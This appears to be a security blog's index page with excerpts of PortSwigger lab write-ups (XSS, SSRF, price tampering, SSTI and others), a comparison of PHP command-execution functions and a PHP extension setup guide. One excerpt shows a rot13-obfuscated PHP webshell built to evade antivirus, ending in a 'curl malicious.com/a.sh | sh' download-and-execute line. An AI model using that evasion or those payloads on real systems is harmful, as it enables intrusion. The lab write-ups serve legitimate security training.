Understanding the Differences Between PHP System Functions in Depth (system, shell_exec, exec, passthru, popen, proc_open)

When poking at a webshell, you often get blocked by Disable Function, and the various cheat sheets online usually teach us other functions for bypassing Disable Function. Here we will not consider LD_PRELOAD or other exotic bypass tricks; instead we start from the 6 most common functions that can execute system commands and look at how they differ in normal use. Their functionality is nearly the same, sometimes even identical, so why does PHP define so many of them? ~~Because PHP is a very hacker-friendly language, with all sorts of ways for hackers to bypass, bypass, bypass!~~ This article compares the differences between system, shell_exec, exec, passthru, popen and proc_open.

system

Let's start with the system function. Looking at the spec, the official description reads:

system — Execute an external program and display the output

system executes an external program and outputs the result directly (similar to echo-ing it to the screen). One characteristic here is that each time the program outputs a line, the displayed result is refreshed (even though the program may not have finished yet). system takes two parameters, $command and &$result_code. $command needs no special explanation; &$result_code receives the Linux return status code through pass-by-reference. ...

2022-03-19 · 3 minutes · steven

Cross-site scripting (XSS) (PortSwigger Writeup)

I feel the XSS labs all feel somewhat alike, and a bit boring QQ

Lab: Reflected XSS into HTML context with nothing encoded

Lab description: This lab contains a simple reflected cross-site scripting vulnerability in the search functionality. To solve the lab, perform a cross-site scripting attack that calls the alert function.

Explanation: Reflected XSS in the search feature.

Solution: Type alert(1) into the search box.

Lab: Stored XSS into HTML context with nothing encoded

Lab description: This lab contains a stored cross-site scripting vulnerability in the comment functionality. To solve this lab, submit a comment that calls the alert function when the blog post is viewed. ...

2022-02-26 · 13 minutes · steven

Simple PHP Webshell AV Evasion

I originally just wanted to throw together a webshell for testing, but it got eaten by Defender right away.

"str_ro"
// "str_ro"."t13" => "str_rot13"
// ("system")(("str_rot13")($e)) => system(str_rot13($e))
// system(str_rot13($e)) => system("curl malicious.com/a.sh | sh")

On VirusTotal it even got all pass, heh

2022-02-15 · 1 minute · steven

PHP Linux Extensions Hello World

The main reason for doing this is that my thesis research is slightly related to RASP, and a PHP RASP needs to be compiled and used through PHP Extensions, so this post mainly records the basics of writing and developing PHP Extensions.

Environment needed for this post: any Linux or WSL with Docker; Docker Ubuntu 20.04; PHP 7.3.33 source code.

Environment setup: After installing Docker, in theory a clean Ubuntu 20.04 docker can be built with a single command; the -v part can be changed to your own mount point.

sudo docker run -it -v /home/steven/compile-rasp/mount_point:/mount_point ubuntu:20.04

Next, install some small tools that may be needed later:

apt update
apt install wget unzip software-properties-common -y
apt-add-repository ppa:ondrej/php
apt install php7.3-dev -y

During the installation of software-properties-common some prompts may pop up; just answer them as they come. Next, download the PHP source code:

cd mount_point
wget https://www.php.net/distributions/php-7.3.33.tar.gz
tar zxvf php-7.3.33.tar.gz
chmod -R 777 * # because I use a mount from outside Docker, this makes permissions simpler to handle

Creating the first Extension: To write an Extension, the first thing is to create one. In the source path php-7.3.33/ext there is a file named ext_skel.php; skel is short for skeleton, i.e. it lets us create a shell to fill in. ...

2022-02-14 · 2 minutes · steven

Server-side request forgery (SSRF) (PortSwigger Writeup)

Lab: Basic SSRF against the local server

Lab description: This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.

Explanation: Arbitrary HTTP GET requests can be sent.

Solution: Looking at the stock check API, it requests http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1. Sending http%3a%2f%2flocalhost%2fadmin instead shows the admin interface. Then send http%3A%2F%2Flocalhost%2Fadmin%2Fdelete%3Fusername%3Dcarlos.

Lab: Basic SSRF against another back-end system

Lab description: This lab has a stock check feature which fetches data from an internal system. ...

2022-02-14 · 4 minutes · steven

Business logic vulnerabilities (PortSwigger Writeup)

Lab: Excessive trust in client-side controls

Lab description: This lab doesn't adequately validate user input. You can exploit a logic flaw in its purchasing workflow to buy items for an unintended price. To solve the lab, buy a "Lightweight l33t leather jacket". You can log in to your own account using the following credentials: wiener:peter

Explanation: Tamper with the POST body.

Solution: When adding to the cart, the price is POSTed along with it:

POST /cart HTTP/1.1
Host: acd31fa31fe0b3dcc04314f500560069.web-security-academy.net
Cookie: session=IxPR6nrwBtk0VSUHVKPDmBuwG2IJVK8z
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Origin: https://acd31fa31fe0b3dcc04314f500560069.web-security-academy.net
Referer: https://acd31fa31fe0b3dcc04314f500560069.web-security-academy.net/product?productId=1
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
X-Originating-Ip: 127.0.0.1
X-Remote-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Te: trailers
Connection: close

productId=1&redir=PRODUCT&quantity=1&price=133700

Tamper it to 1, then go to the cart and check out. ...

2022-02-11 · 9 minutes · steven

WebSockets (PortSwigger Writeup)

Lab: Manipulating WebSocket messages to exploit vulnerabilities

Lab description: This online shop has a live chat feature implemented using WebSockets. Chat messages that you submit are viewed by a support agent in real time. To solve the lab, use a WebSocket message to trigger an alert() popup in the support agent's browser.

Explanation: Practice capturing WebSockets with Burp.

Solution: After capturing with Burp, there is a WebSockets history tab; send the data to Repeater and change the input to {"user":"You","content":" "}

Lab: Manipulating the WebSocket handshake to exploit vulnerabilities

Lab description: This online shop has a live chat feature implemented using WebSockets. ...

2022-02-08 · 3 minutes · steven

Access control vulnerabilities (PortSwigger Writeup)

Lab: Unprotected admin functionality

Lab description: This lab has an unprotected admin panel. Solve the lab by deleting the user carlos.

Explanation: An admin panel with no restrictions.

Solution: robots.txt reveals /administrator-panel; go in and delete the account.

Lab: Unprotected admin functionality with unpredictable URL

Lab description: This lab has an unprotected admin panel. It's located at an unpredictable location, but the location is disclosed somewhere in the application. Solve the lab by accessing the admin panel, and using it to delete the user carlos. ...

2022-02-07 · 6 minutes · steven

Server-side template injection (PortSwigger Writeup)

Lab: Basic server-side template injection

Lab description: This lab is vulnerable to server-side template injection due to the unsafe construction of an ERB template. To solve the lab, review the ERB documentation to find out how to execute arbitrary code, then delete the morale.txt file from Carlos's home directory.

Explanation: The lab says it is an ERB SSTI.

Solution: https://acc21f1d1e22b8ffc0390b0f0087005f.web-security-academy.net/ ?message= returns 49; https://acc21f1d1e22b8ffc0390b0f0087005f.web-security-academy.net/ ?message= retrieves the username; https://acc21f1d1e22b8ffc0390b0f0087005f.web-security-academy.net/ ?message= deletes the file successfully.

Lab: Basic server-side template injection (code context)

Lab description: This lab is vulnerable to server-side template injection due to the way it unsafely uses a Tornado template. To solve the lab, review the Tornado documentation to discover how to execute arbitrary code, then delete the morale.txt file from Carlos's home directory. ...

2022-02-06 · 12 minutes · steven

Information disclosure (PortSwigger Writeup)

Lab: Information disclosure in error messages

Lab description: This lab's verbose error messages reveal that it is using a vulnerable version of a third-party framework. To solve the lab, obtain and submit the version number of this framework.

Explanation: Find a way to make it throw an error, which may leak the version number.

Solution: https://acf81fed1ef0e1cbc040196e00b300c0.web-security-academy.net/product?productId=asd throws an error revealing Apache Struts 2 2.3.31.

Lab: Information disclosure on debug page

Lab description: This lab contains a debug page that discloses sensitive information about the application. To solve the lab, obtain and submit the SECRET_KEY environment variable. ...

2022-02-05 · 2 minutes · steven